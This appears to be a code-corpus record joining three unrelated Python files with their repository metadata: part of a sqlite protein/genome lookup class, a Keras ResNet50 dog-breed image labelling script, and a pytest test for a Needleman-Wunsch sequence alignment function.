return result
def findProtein(self, id_):
"""
Find info about a protein, given a sequence id.
@param id_: A C{str} sequence id. This is either of the form
'civ|GENBANK|%s|GENBANK|%s|%s [%s]' where the protein id is in the
3rd '|'-delimited field, or else is the protein accession number as
already extracted.
@return: A C{dict} with keys corresponding to the names of the columns
in the proteins database table, else C{None} if C{id_} cannot be
found.
"""
try:
accession = self.proteinAccession(id_)
except IndexError:
accession = id_
return self._findProtein(accession)
def _yieldProteins(self, rows, cur):
"""
Helper function for self.findProteinsForGenome.
@param rows: A C{list} of protein database lookup results.
@param cur: An sqlite3 cursor.
@return: A generator that yields C{dict}s with keys corresponding to
the names of the columns in the proteins database table.
"""
while rows:
for row in rows:
result = dict(row)
result['forward'] = bool(result['forward'])
result['circular'] = bool(result['circular'])
result['length'] = int(result['length'])
yield result
rows = cur.fetchmany()
def findProteinsForGenome(self, id_):
"""
Find all proteins for a genome id.
@param id_: A C{str} sequence id. This is either of the form
'civ|GENBANK|%s|GENBANK|%s|%s [%s]' where the genome id is in the
5th '|'-delimited field, or else is the nucleotide sequence
accession number as already extracted.
@return: A generator that yields C{dict}s with keys corresponding to
the names of the columns in the proteins database table, else
C{None} if C{id_} cannot be found.
"""
try:
accession = self.genomeAccession(id_)
except IndexError:
accession = id_
cur = self.execute(
'SELECT * FROM proteins WHERE genomeAccession = ?', (accession,))
rows = cur.fetchmany()
if rows:
return self._yieldProteins(rows, cur)
def execute(self, query, *args):
"""
Execute an SQL statement. See
https://docs.python.org/3.5/library/sqlite3.html#sqlite3.Cursor.execute
for full argument details.
@param query: A C{str} SQL query.
@param args: Additional arguments (if any) to pass to the sqlite3
execute command.
@return: An sqlite3 cursor.
"""
cur = self._connection.cursor()
cur.execute(query, *args)
return cur
def proteinCount(self):
"""
How many proteins are in the database?
@return: An C{int} protein count.
"""
cur = self.execute('SELECT COUNT(1) FROM proteins')
return int(cur.fetchone()[0])
def genomeCount(self):
"""
How many genomes are in the database?
@return: An C{int} genome count.
"""
cur = self.execute('SELECT COUNT(1) FROM genomes')
return int(cur.fetchone()[0])
def close(self):
"""
Close the database connection (if we opened it).
"""
if self._closeConnection:
self._connection.close()
self._connection = None
def __enter__(self):
return self
def __exit__(self, excType, excValue, traceback):
self.close()
|
[
"terry@jon.es"
] |
terry@jon.es
|
5759589b01f465b82f2aa6d757c4e39a3912f334
|
5169e62e414dd0a1109627e2270c684ab5650cef
|
/exp_Resnet50.py
|
454296ba5bb6d4f49e38971379de5a3d28e8474c
|
[
"MIT"
] |
permissive
|
MFajcik/Dog-Breed-Classification
|
f39ff3976d8731dfc13ff32f4383460bd20bb4c9
|
047bc02443962b6a9b04adb5f17f648579bce95c
|
refs/heads/master
| 2021-07-20T03:42:24.438758
| 2017-10-22T22:09:57
| 2017-10-22T22:09:57
| 107,796,811
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,282
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from keras.applications import ResNet50
from keras.applications.vgg16 import preprocess_input, decode_predictions
import prologue
from mpl_toolkits.axes_grid1 import ImageGrid
data_dir = r"C:\\Users\\mfajc\\Kaggle\\DogBreeds"
#data_dir = r"/home/ifajcik/kaggle/dog_breed_classification/dogbreed_data"
labels, _, _, _, _ = prologue.init(data_dir)
NUM_CLASSES = 16
# plot image figure via ImageGrid
fig = plt.figure(1, figsize=(16, 16))
j = int(np.sqrt(NUM_CLASSES))
i = int(np.ceil(NUM_CLASSES / j))
grid = ImageGrid(fig, 111, nrows_ncols=(i, j), axes_pad=0.05)
#Pretrained resnet
model = ResNet50(weights='imagenet')
for i, (img_id, breed) in enumerate(labels.loc[labels['rank'] == 1, ['id', 'breed']].values):
ax = grid[i]
img = prologue.read_img(data_dir,img_id, 'train', (224, 224))
x = preprocess_input(img.copy())
ax.imshow(img / 255.)
x = np.expand_dims(img, axis=0)
preds = model.predict(x)
_, imagenet_class_name, prob = decode_predictions(preds, top=1)[0][0]
ax.text(10, 180, 'ResNet50: %s (%.2f)' % (imagenet_class_name , prob), color='w', backgroundcolor='k', alpha=0.8)
ax.text(10, 200, 'LABEL: %s' % breed, color='k', backgroundcolor='w', alpha=0.8)
ax.axis('off')
plt.show()
|
[
"blackened226@gmail.com"
] |
blackened226@gmail.com
|
1a9a57d460894cd25864c5122caf1b2a8e214682
|
a0c54e54533f34f56f312ec10dfa2fce31719315
|
/needleman_wunsch_test.py
|
12b95cafaa71bf1ab52c7d9e471be459bb82326d
|
[] |
no_license
|
rediska0123/Needleman-Wunsch-algorithm
|
7e43dca51fd652f2ef32b69625cef6a8d153ecfb
|
4b38c0538136d6439d032df724b8d2df07bd5781
|
refs/heads/master
| 2022-12-12T00:04:08.537893
| 2020-09-10T19:29:43
| 2020-09-10T19:29:43
| 294,461,151
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 611
|
py
|
import pytest
from needleman_wunsch import get_max_score_alignment
import numpy as np
def test_get_max_score_alignment():
m = np.array([[10, -1, -3, -4],
[-1, 7, -5, -3],
[-3, -5, 9, 0],
[-4, -3, 0, 8]])
tests = [
("GTTACAA", "GACGTTT", -5, 1.0, "GTTACAA--", "G--ACGTTT"),
("G", "G", 10, 20.0, "-G", "G-"),
("G", "", -5, -5, "G", "-"),
]
for dna1, dna2, d, expected_score, aligned_dna1, aligned_dna2 in tests:
assert get_max_score_alignment(dna1, dna2, m, d) == (expected_score, aligned_dna1, aligned_dna2)
|
[
"rediska0123@gmail.com"
] |
rediska0123@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.